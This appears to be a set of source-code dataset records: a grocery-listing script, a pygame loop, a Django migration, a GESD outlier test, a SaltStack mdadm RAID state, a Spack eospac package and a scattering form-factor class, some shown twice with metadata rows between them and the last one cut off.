{"id":18, "name": "Pizza for One Suprema Frozen Pizza", "department": "frozen", "aisle": "frozen pizza", "price": 12.50},
{"id":19, "name": "Gluten Free Quinoa Three Cheese & Mushroom Blend", "department": "dry goods pasta", "aisle": "grains rice dried goods", "price": 3.99},
{"id":20, "name": "Pomegranate Cranberry & Aloe Vera Enrich Drink", "department": "beverages", "aisle": "juice nectars", "price": 4.25}
] # based on data from Instacart: https://www.instacart.com/datasets/grocery-shopping-2017
# product part 1
# --------------
# THERE ARE 20 PRODUCTS:
# --------------
# + All-Seasons Salt ($4.99)
# + Chocolate Fudge Layer Cake ($18.50)
# + Chocolate Sandwich Cookies ($3.50)
# + Cut Russet Potatoes Steam N' Mash ($4.25)
products_count = len(products)
print("----------------------")
print("THERE ARE " + str(products_count) + " PRODUCTS:")
print("----------------------")
def sort_by_name(any_product):
return any_product["name"]
sorted_products = sorted(products, key=sort_by_name)
for p in sorted_products:
price_usd = " (${0:.2f})".format(p["price"])
print("..." + p["name"] + price_usd)
departments = []
for p in products:
departments.append(p["department"])
unique_departments = list(set(departments))
department_count = len(unique_departments)
print("--------------")
print("THERE ARE " + str(department_count) + " DEPARTMENTS:")
print("--------------")
unique_departments.sort()
for d in unique_departments:
matching_products = [p for p in products if p["department"] ==d]
matching_products_count = len(matching_products)
if matching_products_count >1:
label = "products"
else:
label = "product"
print(" + " + d.title() + " (" + str(matching_products_count) + " " + label + ")")
| true | true |
f73270dce64166830a82286e79f9f4a512fe8e73 | 889 | py | Python | gamelib/main.py | trascen/u2665 | 95eef1e225a8618eab7c1c5d839329b9df31dc9e | [
"Unlicense"
] | 2 | 2017-10-16T15:27:42.000Z | 2017-10-17T17:13:29.000Z | gamelib/main.py | trascen/u2665 | 95eef1e225a8618eab7c1c5d839329b9df31dc9e | [
"Unlicense"
] | null | null | null | gamelib/main.py | trascen/u2665 | 95eef1e225a8618eab7c1c5d839329b9df31dc9e | [
"Unlicense"
] | null | null | null | '''Game main module.
Contains the entry point used by the run_game.py script.
Feel free to put all your game code here, or in other modules in this "gamelib"
package.
'''
import pygame
import pygame.display
import pygame.surface
import pygame.event
import pygame.image
import pygame.transform
from gamelib.scene import MainScene
from gamelib.sprite import Spritey
def main():
''' entry point of the game '''
pygame.init()
real_screen = pygame.display.set_mode([640*2, 480*2])
clock = pygame.time.Clock()
scene = MainScene()
while scene:
scene = scene.update()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and event.key == pygame.K_q or event.type == pygame.QUIT:
scene = None
if scene:
scene.draw(real_screen)
pygame.display.flip()
clock.tick(60) | 22.794872 | 101 | 0.655793 |
import pygame
import pygame.display
import pygame.surface
import pygame.event
import pygame.image
import pygame.transform
from gamelib.scene import MainScene
from gamelib.sprite import Spritey
def main():
pygame.init()
real_screen = pygame.display.set_mode([640*2, 480*2])
clock = pygame.time.Clock()
scene = MainScene()
while scene:
scene = scene.update()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and event.key == pygame.K_q or event.type == pygame.QUIT:
scene = None
if scene:
scene.draw(real_screen)
pygame.display.flip()
clock.tick(60) | true | true |
f7327108494348874c7a463c5e8d80166a93299e | 1,203 | py | Python | manager/director/apps/users/migrations/0004_massemail.py | darius-kia/director4 | 1d2c2c4c3ec12cc9b7f846d5dc075ea3bbef36f9 | [
"MIT"
] | 7 | 2020-08-23T23:08:34.000Z | 2021-12-02T04:17:37.000Z | manager/director/apps/users/migrations/0004_massemail.py | darius-kia/director4 | 1d2c2c4c3ec12cc9b7f846d5dc075ea3bbef36f9 | [
"MIT"
] | 43 | 2020-08-24T16:48:29.000Z | 2022-03-02T19:45:54.000Z | manager/director/apps/users/migrations/0004_massemail.py | darius-kia/director4 | 1d2c2c4c3ec12cc9b7f846d5dc075ea3bbef36f9 | [
"MIT"
] | 10 | 2020-08-17T20:42:52.000Z | 2021-07-16T03:46:51.000Z | # Generated by Django 2.2.12 on 2020-04-07 14:15
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0003_user_accepted_guidelines'),
]
operations = [
migrations.CreateModel(
name='MassEmail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subject', models.CharField(max_length=200)),
('text_html', models.TextField()),
('text_plain', models.TextField()),
('created_time', models.DateTimeField(auto_now_add=True)),
('sent_time', models.DateTimeField(default=None, null=True)),
('limit_users', models.ManyToManyField(help_text='If this is empty, the email will be sent to ALL users!', related_name='_massemail_limit_users_+', to=settings.AUTH_USER_MODEL)),
('sender', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='sent_emails', to=settings.AUTH_USER_MODEL)),
],
),
]
| 41.482759 | 194 | 0.637573 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0003_user_accepted_guidelines'),
]
operations = [
migrations.CreateModel(
name='MassEmail',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('subject', models.CharField(max_length=200)),
('text_html', models.TextField()),
('text_plain', models.TextField()),
('created_time', models.DateTimeField(auto_now_add=True)),
('sent_time', models.DateTimeField(default=None, null=True)),
('limit_users', models.ManyToManyField(help_text='If this is empty, the email will be sent to ALL users!', related_name='_massemail_limit_users_+', to=settings.AUTH_USER_MODEL)),
('sender', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='sent_emails', to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
f732712de1cc15b3e1d91ae8e6631e12c2ea6874 | 6,412 | py | Python | src/signal_processing_algorithms/gesd.py | dbradf/signal-processing-algorithms | 75312e873543f0f89aace75f43ded783395425c5 | [
"Apache-2.0"
] | 19 | 2020-04-13T11:26:50.000Z | 2022-03-28T12:43:04.000Z | src/signal_processing_algorithms/gesd.py | dbradf/signal-processing-algorithms | 75312e873543f0f89aace75f43ded783395425c5 | [
"Apache-2.0"
] | 11 | 2020-03-17T19:20:21.000Z | 2022-01-27T22:27:25.000Z | src/signal_processing_algorithms/gesd.py | dbradf/signal-processing-algorithms | 75312e873543f0f89aace75f43ded783395425c5 | [
"Apache-2.0"
] | 5 | 2020-05-13T16:53:40.000Z | 2022-01-26T23:11:45.000Z | # -*- coding: utf-8 -*-
"""
GESD based Detect outliers.
Generalized ESD Test for Outliers
see 'GESD<https://www.itl.nist.gov/div898/handbook/eda/section3/eda35h3.htm>'
"""
import collections
from typing import List
import numpy as np
import numpy.ma as ma
import structlog
from scipy.stats import t
LOG = structlog.get_logger()
GesdResult = collections.namedtuple(
"GesdResult",
["count", "suspicious_indexes", "test_statistics", "critical_values", "all_z_scores"],
)
"""
A named tuple for the results of the GESD algorithm.
The outliers are in suspicious_indexes[count:].
The low confidence outliers are in suspicious_indexes[:count].
:type count: int,
:type suspicious_indexes: list(int)
:type test_statistics: list(float)
:type critical_values: list(float)
:type all_z_scores: list(float, float)
:type series: list(float)
"""
def gesd(
data: List[float], max_outliers: int = 10, significance_level: float = 0.05, mad: bool = False
) -> GesdResult:
"""
Perform a Generalized ESD Test for Outliers.
The generalized ESD(Extreme Studentized Deviate) test (Rosner 1983) is used to detect one or
more outliers in a univariate data set that follows an approximately normal distribution.
Usage:
gesd_result = gesd(
series,
max_outliers,
significance_level=significance,
mad=True)
count = gesd_result.count
indexes = gesd_result.suspicious_indexes
print("outliers indexes {}".format(indexes[:count])
print("low confidence outliers indexes {}".format(indexes[count:])
If the standard deviation of the series data is zero then the outlier detection will bail out.
For non-mad this entails a constant series or sub-series so this behaviour makes sense.
In the MAD case, this may mean that the series is constant or that a majority of the series
are the median value. The data should be validated to avoid this issue.
Note: the test_statistics array is signed, this allows determination of the outlier above
or below the mean.
:param data: The data to test.
:param max_outliers: Test for up to max outliers.
:param significance_level: Test for up to max outliers.
:param mad: Use Median Absolute Deviation.
:return: The number of outliers, suspicious indexes, test_statistics, critical_values, z_values.
see 'here<https://www.itl.nist.gov/div898/handbook/eda/section3/eda35h3.htm>'
"""
if data is None or np.size(data) == 0:
raise ValueError("No Data ({})".format(data))
length = len(data)
if max_outliers < 1:
raise ValueError(
"max_outliers({max_outliers}) must be >= 1".format(max_outliers=max_outliers)
)
if max_outliers >= len(data):
raise ValueError(
"max_outliers({max_outliers}) <= length({length})".format(
length=len(data) if data is not None else None, max_outliers=max_outliers
)
)
if significance_level <= 0.0 or significance_level >= 1.0:
raise ValueError(
"invalid significance_level({significance_level})".format(
significance_level=significance_level
)
)
series = ma.array(data)
test_statistics = []
critical_values = []
potential_outlier_indices = []
# max outliers must be less than length, the standard deviation and mad of a single entry list
# are 0 so z score would be nan.
m_outliers = min(max_outliers, length - 1)
indexes = np.arange(m_outliers, dtype=int)
for i in indexes:
LOG.debug("iteration", i=i, mad=mad, series=series)
if mad:
# sigma in this case is an estimate of .75 quantile * MAD
# note : 1.4826 == 1 / Q(.75) == 1 / 0.675
center = np.ma.median(series)
sigma = 1.4826 * np.ma.median(np.fabs(series - center))
else:
center = series.mean()
sigma = series.std(ddof=1)
if sigma == 0:
break
z_scores = (series - center) / sigma
if i == 0:
all_z_scores = (series - center) / sigma
LOG.debug("calculate", z_scores=np.array([np.arange(length, dtype=int), z_scores]).T)
max_z_score_index = np.fabs(z_scores).argmax()
max_z_score = z_scores[max_z_score_index]
# 2 sided test for significance.
significance_result = 1.0 - significance_level / (2.0 * (length - i))
# Percent point function with df (degrees of freedom).
percentage_point = t.ppf(significance_result, df=length - i - 2)
value = (
(length - i - 1)
* percentage_point
/ np.sqrt((length - i - 2 + percentage_point ** 2) * (length - i))
)
# Update results.
potential_outlier_indices.append(max_z_score_index)
test_statistics.append(max_z_score)
critical_values.append(value)
LOG.debug(
"iteration complete",
z_scores=np.array(
[
np.arange(max_outliers, dtype=int),
test_statistics,
critical_values,
np.greater(test_statistics, critical_values),
]
).T,
)
# Mask and exclude the selected value from the next iteration.
series[max_z_score_index] = ma.masked
LOG.debug("values calculated", max_z_scores=test_statistics, lambda_values=critical_values)
if potential_outlier_indices:
for number_outliers in range(len(potential_outlier_indices), 0, -1):
if np.abs(test_statistics[number_outliers - 1]) > critical_values[number_outliers - 1]:
LOG.debug(
"outliers discovered",
number_outliers=number_outliers,
outliers=potential_outlier_indices[0:number_outliers],
)
return GesdResult(
number_outliers,
potential_outlier_indices,
test_statistics,
critical_values,
all_z_scores[potential_outlier_indices],
)
return GesdResult(
0,
potential_outlier_indices,
test_statistics,
critical_values,
all_z_scores[potential_outlier_indices] if potential_outlier_indices else [],
)
| 34.473118 | 100 | 0.629757 |
import collections
from typing import List
import numpy as np
import numpy.ma as ma
import structlog
from scipy.stats import t
LOG = structlog.get_logger()
GesdResult = collections.namedtuple(
"GesdResult",
["count", "suspicious_indexes", "test_statistics", "critical_values", "all_z_scores"],
)
def gesd(
data: List[float], max_outliers: int = 10, significance_level: float = 0.05, mad: bool = False
) -> GesdResult:
if data is None or np.size(data) == 0:
raise ValueError("No Data ({})".format(data))
length = len(data)
if max_outliers < 1:
raise ValueError(
"max_outliers({max_outliers}) must be >= 1".format(max_outliers=max_outliers)
)
if max_outliers >= len(data):
raise ValueError(
"max_outliers({max_outliers}) <= length({length})".format(
length=len(data) if data is not None else None, max_outliers=max_outliers
)
)
if significance_level <= 0.0 or significance_level >= 1.0:
raise ValueError(
"invalid significance_level({significance_level})".format(
significance_level=significance_level
)
)
series = ma.array(data)
test_statistics = []
critical_values = []
potential_outlier_indices = []
m_outliers = min(max_outliers, length - 1)
indexes = np.arange(m_outliers, dtype=int)
for i in indexes:
LOG.debug("iteration", i=i, mad=mad, series=series)
if mad:
center = np.ma.median(series)
sigma = 1.4826 * np.ma.median(np.fabs(series - center))
else:
center = series.mean()
sigma = series.std(ddof=1)
if sigma == 0:
break
z_scores = (series - center) / sigma
if i == 0:
all_z_scores = (series - center) / sigma
LOG.debug("calculate", z_scores=np.array([np.arange(length, dtype=int), z_scores]).T)
max_z_score_index = np.fabs(z_scores).argmax()
max_z_score = z_scores[max_z_score_index]
significance_result = 1.0 - significance_level / (2.0 * (length - i))
percentage_point = t.ppf(significance_result, df=length - i - 2)
value = (
(length - i - 1)
* percentage_point
/ np.sqrt((length - i - 2 + percentage_point ** 2) * (length - i))
)
potential_outlier_indices.append(max_z_score_index)
test_statistics.append(max_z_score)
critical_values.append(value)
LOG.debug(
"iteration complete",
z_scores=np.array(
[
np.arange(max_outliers, dtype=int),
test_statistics,
critical_values,
np.greater(test_statistics, critical_values),
]
).T,
)
series[max_z_score_index] = ma.masked
LOG.debug("values calculated", max_z_scores=test_statistics, lambda_values=critical_values)
if potential_outlier_indices:
for number_outliers in range(len(potential_outlier_indices), 0, -1):
if np.abs(test_statistics[number_outliers - 1]) > critical_values[number_outliers - 1]:
LOG.debug(
"outliers discovered",
number_outliers=number_outliers,
outliers=potential_outlier_indices[0:number_outliers],
)
return GesdResult(
number_outliers,
potential_outlier_indices,
test_statistics,
critical_values,
all_z_scores[potential_outlier_indices],
)
return GesdResult(
0,
potential_outlier_indices,
test_statistics,
critical_values,
all_z_scores[potential_outlier_indices] if potential_outlier_indices else [],
)
| true | true |
f7327283137a8089ad6e5e8c1b25b9b0b020b6c1 | 3,502 | py | Python | salt/states/mdadm.py | skrobul/salt | ef7fb71082cce7a9783e00b9c65062fefae09263 | [
"Apache-2.0"
] | 1 | 2018-02-03T17:30:56.000Z | 2018-02-03T17:30:56.000Z | salt/states/mdadm.py | skrobul/salt | ef7fb71082cce7a9783e00b9c65062fefae09263 | [
"Apache-2.0"
] | null | null | null | salt/states/mdadm.py | skrobul/salt | ef7fb71082cce7a9783e00b9c65062fefae09263 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Managing software RAID with mdadm
==================================
A state module for creating or destroying software RAID devices.
.. code-block:: yaml
/dev/md0:
raid.present:
- opts: level=1 chunk=256 raid-devices=2 /dev/xvdd /dev/xvde
'''
# Import python libs
import logging
# Import salt libs
import salt.utils
# Set up logger
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'raid'
def __virtual__():
'''
mdadm provides raid functions for Linux
'''
if __grains__['kernel'] != 'Linux':
return False
if not salt.utils.which('mdadm'):
return False
return __virtualname__
def present(name, opts=None):
'''
Verify that the raid is present
name
The name of raid device to be created
opts
The mdadm options to use to create the raid. See
:mod:`mdadm <salt.modules.mdadm>` for more information.
Opts can be expressed as a single string of options.
.. code-block:: yaml
/dev/md0:
raid.present:
- opts: level=1 chunk=256 raid-devices=2 /dev/xvdd /dev/xvde
Or as a list of options.
.. code-block:: yaml
/dev/md0:
raid.present:
- opts:
- level=1
- chunk=256
- raid-devices=2
- /dev/xvdd
- /dev/xvde
'''
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
args = [name]
if isinstance(opts, str):
opts = opts.split()
args.extend(opts)
# Device exists
raids = __salt__['raid.list']()
if raids.get(name):
ret['comment'] = 'Raid {0} already present'.format(name)
return ret
# If running with test use the test_mode with create
if __opts__['test']:
args.extend(['test_mode=True'])
res = __salt__['raid.create'](*args)
ret['comment'] = 'Raid will be created with: {0}'.format(res)
ret['result'] = None
return ret
# Attempt to create the array
__salt__['raid.create'](*args)
raids = __salt__['raid.list']()
changes = raids.get(name)
if changes:
ret['comment'] = 'Raid {0} created.'.format(name)
ret['changes'] = changes
# Saving config
__salt__['raid.save_config']()
else:
ret['comment'] = 'Raid {0} failed to be created.'.format(name)
ret['result'] = False
return ret
def absent(name):
'''
Verify that the raid is absent
name
The name of raid device to be destroyed
.. code-block:: yaml
/dev/md0:
raid:
- absent
'''
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
# Raid does not exist
if name not in __salt__['raid.list']():
ret['comment'] = 'Raid {0} already absent'.format(name)
return ret
elif __opts__['test']:
ret['comment'] = 'Raid {0} is set to be destroyed'.format(name)
ret['result'] = None
return ret
else:
# Attempt to destroy raid
ret['result'] = __salt__['raid.destroy'](name)
if ret['result']:
ret['comment'] = 'Raid {0} has been destroyed'.format(name)
else:
ret['comment'] = 'Raid {0} failed to be destroyed'.format(name)
return ret
| 23.823129 | 76 | 0.540548 |
import logging
import salt.utils
log = logging.getLogger(__name__)
__virtualname__ = 'raid'
def __virtual__():
if __grains__['kernel'] != 'Linux':
return False
if not salt.utils.which('mdadm'):
return False
return __virtualname__
def present(name, opts=None):
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
args = [name]
if isinstance(opts, str):
opts = opts.split()
args.extend(opts)
# Device exists
raids = __salt__['raid.list']()
if raids.get(name):
ret['comment'] = 'Raid {0} already present'.format(name)
return ret
# If running with test use the test_mode with create
if __opts__['test']:
args.extend(['test_mode=True'])
res = __salt__['raid.create'](*args)
ret['comment'] = 'Raid will be created with: {0}'.format(res)
ret['result'] = None
return ret
# Attempt to create the array
__salt__['raid.create'](*args)
raids = __salt__['raid.list']()
changes = raids.get(name)
if changes:
ret['comment'] = 'Raid {0} created.'.format(name)
ret['changes'] = changes
# Saving config
__salt__['raid.save_config']()
else:
ret['comment'] = 'Raid {0} failed to be created.'.format(name)
ret['result'] = False
return ret
def absent(name):
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
# Raid does not exist
if name not in __salt__['raid.list']():
ret['comment'] = 'Raid {0} already absent'.format(name)
return ret
elif __opts__['test']:
ret['comment'] = 'Raid {0} is set to be destroyed'.format(name)
ret['result'] = None
return ret
else:
# Attempt to destroy raid
ret['result'] = __salt__['raid.destroy'](name)
if ret['result']:
ret['comment'] = 'Raid {0} has been destroyed'.format(name)
else:
ret['comment'] = 'Raid {0} failed to be destroyed'.format(name)
return ret
| true | true |
f73274ca464f6c55696bccac5f5bb1b094e363e5 | 2,916 | py | Python | var/spack/repos/builtin/packages/eospac/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2021-02-22T18:04:31.000Z | 2021-02-22T18:04:31.000Z | var/spack/repos/builtin/packages/eospac/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-04-24T13:30:08.000Z | 2020-04-24T13:40:08.000Z | var/spack/repos/builtin/packages/eospac/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-03-06T11:04:37.000Z | 2020-03-06T11:04:37.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Eospac(Package):
"""A collection of C routines that can be used to access the Sesame data
library.
"""
homepage = "http://laws.lanl.gov/projects/data/eos.html"
list_url = "http://laws.lanl.gov/projects/data/eos/eospacReleases.php"
version('6.4.0', sha256='15a953beac735c68431afe86ffe33323d540d0fbbbec03ba79438dd29736051d',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0_612ea8c9b8ffa6d9175d9118955571d9107f1e3c.tgz")
version('6.4.0beta.4', sha256='0ebfd8badff575ea77444aa978629dbdca3135a0b5eb373b8daba058773d4635',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.4_aff6429bb6868de31a980278bafa13487c2ce83f.tgz")
version('6.4.0beta.3', sha256='9f387ca5356519494c6f3f27adb0c165cf9f9e15e3355a67bf940a4a92eebdab',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.3_90ff265f62aa1780bfcd0a62dad807b6be6ed461.tgz")
version('6.4.0beta.2', sha256='f9db46cd6c62a6f83960d802350f3e37675921af102969b293c02eb797558a53',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.2_69196eadbc77506561eef711f19d2f03b4ab0ffa.tgz")
version('6.4.0beta.1', sha256='14c5c804e5f628f41e8ed80bcee5a80adeb6c6f3d130715421ca99a30c7eb7e2',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.1_r20171213193219.tgz")
version('6.3.1', sha256='aa1112c4251c9c3c2883a7ab2c7f2abff2c339f29dbbf8421ef88b0c9df904f8', preferred=True,
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.3.1_r20161202150449.tgz")
# This patch allows the use of spack's compile wrapper 'flang'
patch('flang.patch', when='@:6.4.0beta.2%clang')
def install(self, spec, prefix):
with working_dir('Source'):
make('install',
'CC={0}'.format(spack_cc),
'CXX={0}'.format(spack_cxx),
'F77={0}'.format(spack_f77),
'F90={0}'.format(spack_fc),
'prefix={0}'.format(prefix),
'INSTALLED_LIBRARY_DIR={0}'.format(prefix.lib),
'INSTALLED_INCLUDE_DIR={0}'.format(prefix.include),
'INSTALLED_EXAMPLE_DIR={0}'.format(prefix.example),
'INSTALLED_BIN_DIR={0}'.format(prefix.bin))
# fix conflict with linux's getopt for 6.4.0beta.2
if spec.satisfies('@6.4.0beta.2'):
with working_dir(prefix.bin):
move('getopt', 'driver_getopt')
| 57.176471 | 159 | 0.698903 |
from spack import *
class Eospac(Package):
homepage = "http://laws.lanl.gov/projects/data/eos.html"
list_url = "http://laws.lanl.gov/projects/data/eos/eospacReleases.php"
version('6.4.0', sha256='15a953beac735c68431afe86ffe33323d540d0fbbbec03ba79438dd29736051d',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0_612ea8c9b8ffa6d9175d9118955571d9107f1e3c.tgz")
version('6.4.0beta.4', sha256='0ebfd8badff575ea77444aa978629dbdca3135a0b5eb373b8daba058773d4635',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.4_aff6429bb6868de31a980278bafa13487c2ce83f.tgz")
version('6.4.0beta.3', sha256='9f387ca5356519494c6f3f27adb0c165cf9f9e15e3355a67bf940a4a92eebdab',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.3_90ff265f62aa1780bfcd0a62dad807b6be6ed461.tgz")
version('6.4.0beta.2', sha256='f9db46cd6c62a6f83960d802350f3e37675921af102969b293c02eb797558a53',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.2_69196eadbc77506561eef711f19d2f03b4ab0ffa.tgz")
version('6.4.0beta.1', sha256='14c5c804e5f628f41e8ed80bcee5a80adeb6c6f3d130715421ca99a30c7eb7e2',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.1_r20171213193219.tgz")
version('6.3.1', sha256='aa1112c4251c9c3c2883a7ab2c7f2abff2c339f29dbbf8421ef88b0c9df904f8', preferred=True,
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.3.1_r20161202150449.tgz")
patch('flang.patch', when='@:6.4.0beta.2%clang')
def install(self, spec, prefix):
with working_dir('Source'):
make('install',
'CC={0}'.format(spack_cc),
'CXX={0}'.format(spack_cxx),
'F77={0}'.format(spack_f77),
'F90={0}'.format(spack_fc),
'prefix={0}'.format(prefix),
'INSTALLED_LIBRARY_DIR={0}'.format(prefix.lib),
'INSTALLED_INCLUDE_DIR={0}'.format(prefix.include),
'INSTALLED_EXAMPLE_DIR={0}'.format(prefix.example),
'INSTALLED_BIN_DIR={0}'.format(prefix.bin))
# fix conflict with linux's getopt for 6.4.0beta.2
if spec.satisfies('@6.4.0beta.2'):
with working_dir(prefix.bin):
move('getopt', 'driver_getopt')
| true | true |
f73274e98631a7c59fbcf53f1b533864bc4b4c67 | 6,295 | py | Python | Functions/FormFactors/SphericalShell_expDecay.py | prjemian/XAnoS | 8a70380a88421042feff6f4aa9f5cf1f79ab4efc | [
"MIT"
] | null | null | null | Functions/FormFactors/SphericalShell_expDecay.py | prjemian/XAnoS | 8a70380a88421042feff6f4aa9f5cf1f79ab4efc | [
"MIT"
] | null | null | null | Functions/FormFactors/SphericalShell_expDecay.py | prjemian/XAnoS | 8a70380a88421042feff6f4aa9f5cf1f79ab4efc | [
"MIT"
] | null | null | null | ####Please do not remove lines below####
from lmfit import Parameters
import numpy as np
import sys
import os
sys.path.append(os.path.abspath('.'))
sys.path.append(os.path.abspath('./Functions'))
sys.path.append(os.path.abspath('./Fortran_rountines'))
####Please do not remove lines above####
####Import your modules below if needed####
from xraydb import XrayDB
#from pyEQL import chemical_formula
class SphericalShell_expDecay: #Please put the class name same as the function name
No = 6.023e23 # Avagadro number
re2= (2.817e-5)**2 # Square of classical electron radius in Angs^2
def __init__(self, x=0, rmin=0.0, rmax=30.0, Nr=31, Rc=10.0, strho=1.0, tst=2.0, lrho=0.5, lexp=10.0, rhosol=0.0, norm=1.0, bkg=0.0, mpar={}):
"""
Documentation
x : independent variable in the form of a scalar or an array
Rc : Radial distance in Angstroms after which the solvent contribution starts
strho : Concentration of the ions of interest in the stern layer in Molar
tst : Thickness of stern layer in Angstroms
lrho : The maximum concentration of the diffuse layer in Molars
lexp : The decay length of the diffuse layer assuming exponential decay
rhosol : The surrounding bulk density
norm : Density of particles in Moles/Liter
bkg : Constant background
"""
if type(x)==list:
self.x=np.array(x)
else:
self.x=x
self.rmin=rmin
self.rmax=rmax
self.Nr=Nr
self.Rc=Rc
self.strho=strho
self.tst=tst
self.lrho=lrho
self.lexp=lexp
self.rhosol=rhosol
self.norm=norm
self.bkg=bkg
self.__mpar__=mpar #If there is any multivalued parameter
self.choices={} #If there are choices available for any fixed parameters
self.__xrdb__=XrayDB()
self.init_params()
def init_params(self):
"""
Define all the fitting parameters like
self.param.add('sig',value=0,vary=0)
"""
self.params=Parameters()
self.params.add('Rc',value=self.Rc,vary=0,min=-np.inf,max=np.inf,expr=None,brute_step=0.1)
self.params.add('strho', value=self.strho, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('tst', value=self.tst, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('lrho', value=self.lrho, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('lexp', value=self.lexp, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('norm', value=self.norm, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('bkg', value=self.bkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
def solrho(self, r, Rp=100.0, Rc=12.5, strho=1.0, tst=2.0, lrho=0.5, lexp=10.0, rhosol=0.0):
"""
Calculates the electron density for the distribution of ions as a function of radial distance surrounding a spherical particle
Rp :: Radius of the sphere in Angstroms enclosing the spherical particle
Rc :: Radial distance in Angstroms after which the solvent contribution starts
strho :: Concentration of the ions of interest in the stern layer in Molar
tst :: Thickness of stern layer in Angstroms
lrho :: The maximum concentration of the diffuse layer in Molars
lexp :: The decay length of the diffuse layer assuming exponential decay
rhosol :: The surrounding bulk density
"""
R1=Rc
R2=Rc+tst
#integral=np.sum([r1**2*np.exp(-(r1-R2)/lexp) for r1 in np.linspace(R2,Rp,1001)])*(Rp-R2)/1000
integral=lexp*(R2**2*np.exp(-R2/lexp)-Rp**2*np.exp(-Rp/lexp))+2*lexp**2*(R2*np.exp(-R2/lexp)-Rp*np.exp(-Rp/lexp))+2*lexp**3*(np.exp(-Rp/lexp)-np.exp(-R2/lexp))
rhos=(rhosol*(Rp**3-R1**3)-strho*(R2**3-R1**3)-3*lrho*integral*np.exp(R2/lexp))/(Rp**3-R2**3)
self.output_params['scaler_parameters']['rho_bulk']=rhos
stern = np.where(r > R1, strho, 0.0) * np.where(r > R2, 0.0, 1.0)
diffuse = np.where(r > R2, lrho * np.exp(-(r - R2) / lexp) + rhos, 0.0)
rho = (stern + diffuse)
return rho # in Moles/Liter
def calc_form(self, q, r, rho):
"""
Calculates the isotropic form factor using the isotropic electron density as a funciton of radial distance
q :: scaler or array of reciprocal reciprocal wave vector in inv. Angstroms at which the form factor needs to be calculated in
r :: array of radial distances at which the element/ion density in known in Angstroms
rho :: array of element/ion densities as a function of radial distance in el/Angstroms^3. Note: The electron density should decay to zero at the last radial distance
"""
dr = r[1] - r[0]
form = np.zeros_like(q)
rho = (rho - rho[-1])* self.No/1e27 #converting it to moles/Angs^3
for r1, rho1 in zip(r, rho):
form = form + 4 * np.pi * r1 * rho1 * np.sin(q * r1) / q
form = (np.absolute(form) * dr)**2
return self.re2 * form * 1e-16 * self.No / 1e3 # in cm^-1
def y(self):
"""
Define the function in terms of x to return some value
"""
self.output_params={}
self.output_params['scaler_parameters']={}
r=np.linspace(self.rmin, self.rmax, self.Nr)
strho=self.params['strho'].value
tst=self.params['tst'].value
lrho=self.params['lrho'].value
lexp=self.params['lexp'].value
#rhosol=self.params['rhosol'].value
norm=self.params['norm'].value
bkg=self.params['bkg'].value
Rc = self.params['Rc'].value
Rp=(3/(4*np.pi*norm*6.022e23))**(1.0/3.0)*1e9
rho=self.solrho(r, Rp=Rp, Rc=Rc, strho=strho, tst=tst, lrho=lrho, lexp=lexp, rhosol=self.rhosol)
self.output_params['Electron_Density']={'x':r,'y':rho}
self.output_params['scaler_parameters']['Rp']=Rp
form=norm*self.calc_form(self.x,r,rho)+bkg
return form
if __name__=='__main__':
x=np.arange(0.001,1.0,0.1)
fun=SphericalShell_expDecay(x=x)
print(fun.y())
| 46.62963 | 177 | 0.624305 | os.path.abspath('./Functions'))
sys.path.append(os.path.abspath('./Fortran_rountines'))
if type(x)==list:
self.x=np.array(x)
else:
self.x=x
